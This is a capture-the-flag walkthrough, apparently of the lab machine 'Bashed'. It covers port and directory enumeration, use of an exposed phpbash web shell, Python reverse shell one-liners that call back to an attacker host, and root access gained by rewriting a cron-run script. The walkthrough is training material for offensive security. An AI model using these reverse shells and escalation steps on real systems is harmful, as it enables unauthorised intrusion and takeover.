Enumeration
NMAP
Using the lazy script *-A* (for all scripts) we discover an open port at 80, running Apache 2.4.18 (UBUNTU).
# nmap -A 10.10.10.68
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-08 03:14 EDT
Nmap scan report for 10.10.10.68
Host is up (0.050s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
...[snipped]
Let’s see what’s this website is about.
Dirbuster report
Of course, running a directory bruteforce is the next logical thing to do. It reveals bunch of directories and files that are interesting:
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Thu Apr 08 03:25:09 EDT 2021
--------------------------------
http://10.10.10.68:80
--------------------------------
Directories found during testing:
Dirs found with a 200 response:
/
/css/
/dev/
/images/
/js/
/demo-images/
/php/
/uploads/
Dirs found with a 403 response:
/icons/
/icons/small/
--------------------------------
Files found during testing:
Files found with a 200 responce:
/dev/phpbash.min.php
/index.html
/single.html
/css/carouFredSel.css
/css/clear.css
/dev/phpbash.php
/css/common.css
/css/font-awesome.min.css
/css/sm-clean.css
/js/jquery.js
/js/imagesloaded.pkgd.js
/js/jquery.nicescroll.min.js
/js/jquery.smartmenus.min.js
/js/jquery.carouFredSel-6.0.0-packed.js
/js/jquery.mousewheel.min.js
/js/jquery.touchSwipe.min.js
/js/jquery.easing.1.3.js
/js/main.js
/js/custom_google_map_style.js
/js/html5.js
/config.php
/php/sendMail.php
The developer boasted about a phpbash file which he created onto the platform. Let’s see how we can use it to our advantage.
Burp Suite
I am going to try and see the contents of the file of interest.
Request
The file runs bash commands on the local host. Let’s cat our first flag 🙂
POST /dev/phpbash.min.php/ HTTP/1.1
Host: 10.10.10.68
Content-Length: 41
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Origin: http://10.10.10.68
Referer: http://10.10.10.68/dev/phpbash.min.php/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
cmd=cd /home/arrexel;pwd;ls;cat user.txt;
Response
HTTP/1.1 200 OK
Date: Thu, 08 Apr 2021 08:02:27 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 56
Connection: close
Content-Type: text/html; charset=UTF-8
/home/arrexel
user.txt
2c281f31<redacted>
Let’s see how we can escalate our privileges and gain root.
Firstly, let’s get reverse shell:
- change attacking IP:PORT
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Result:
Let’s upgrade our shell, so that we could make it more usable:
- Spawn better shell: python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
- Get access to term commands: export TERM=xterm
- Background the shell with CNTRL + Z and turn on autocomplete etc. by typing in original terminal: stty raw -echo; fg
Privelege Escalation
- Ran linenum.sh locally but nothing really was of interest.
- Looked for SGID/SUID files.
- finally looked into sudoers and received the following output:
$ sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
It seems we (www-data) could run commands as user scriptmanager since it does not require password.
$ sudo -u scriptmanager whoami
scriptmanager
To become user scriptmanager we type in:
sudo -u scriptmanager /bin/bash -i
Let’s enumerate further. What does this user owns or has access to?
[email protected]:/$ find / -type f -user scriptmanager 2>/dev/null
/scripts/test.py
/home/scriptmanager/.profile
/home/scriptmanager/.bashrc
/home/scriptmanager/.selected_editor
/home/scriptmanager/.bash_history
/home/scriptmanager/.bash_logout
It appears it owns something within /scripts/test.py
[email protected]:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
It opens test.txt and writes a string into it, hmm. Who owns test.txt?
[email protected]:/scripts$ ll
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Apr 8 03:19 ./
drwxr-xr-x 23 root root 4096 Dec 4 2017 ../
-rw-r--r-- 1 scriptmanager scriptmanager 282 Apr 8 03:19 test.py
-rw-r--r-- 1 root root 12 Apr 8 03:03 test.txt
So, if it is executed by cron, test.py runs as root since it opens test.txt? Or, perhaps the scheduler runs everything as root in the folder. Let’s add sauce: python reverse shell
[email protected]:/scripts$ cat test.py
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.6",5555)) //change this
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Results in reverse shell
# nc -lnvp 5555
listening on \[any\] 1337 ...
connect to \[10.10.14.6\] from (UNKNOWN) \[10.10.10.68\] 50176
/bin/sh: 0: can’t access tty; job control turned off
# whoami
root
# cat /root/root.txt
Try smarter, not harder. 